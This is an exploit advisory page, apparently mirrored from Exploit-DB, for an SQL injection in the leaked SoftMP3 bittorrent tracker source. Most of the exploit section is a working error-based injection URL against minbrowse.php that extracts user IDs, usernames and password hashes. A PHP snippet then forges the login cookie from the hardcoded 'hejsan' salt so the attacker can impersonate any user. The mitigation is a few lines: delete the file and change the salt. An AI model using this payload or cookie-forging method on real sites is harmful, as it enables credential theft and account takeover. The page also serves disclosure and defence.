SOFTMP3 source code SQL injection

vendor:

SoftMP3 source code

by:

mArTi

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: SoftMP3 source code

Affected Version From: No others versions available...

Affected Version To: No others versions available...

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows / Unix

2011

SOFTMP3 source code SQL injection

SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection. The PoC involves sending a malicious SQL query to the minbrowse.php file, which can be used to extract user information from the database. The Fix involves deleting the minbrowse.php file and changing the cookie encryption in bittorent.php file.

Mitigation:

Delete the minbrowse.php file and change the cookie encryption in bittorent.php file.

Source

Exploit-DB raw data:

# Exploit Title: SOFTMP3 source code SQL injection
# Date: 23/04/2011
# Author: mArTi
# Software Link: http://softmp3.org/
# Version: No others versions available...
# Tested on: Windows / Unix

/.................................../ Introduction /.................................../

SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection.
Here's the PoC and the Fix

/.................................../ PoC /.................................../

-> SQL http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"

-----> Then you can use this to connect as the user you want by the passhash you got and setting the following cookies :

uid=id
pass=encrypted passhash (see down)


---------> getting encrypted passhash to connect with the cookies
<?php
$test=md5($HTTP_SERVER_VARS["REMOTE_ADDR"]."passhash"."hejsan".$HTTP_SERVER_VARS["REMOTE_ADDR"]);
echo "pass cookie is $test"
?>

/.................................../ FIX /.................................../

Delete /minbrowse.php (useless).

BTW, if you want to protect the cookies, just change the cookie encryption in bittorent.php file (like the "hejsan" key or the order of terms in encryption)



-------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------
Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, you'll know where to find me.
-------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------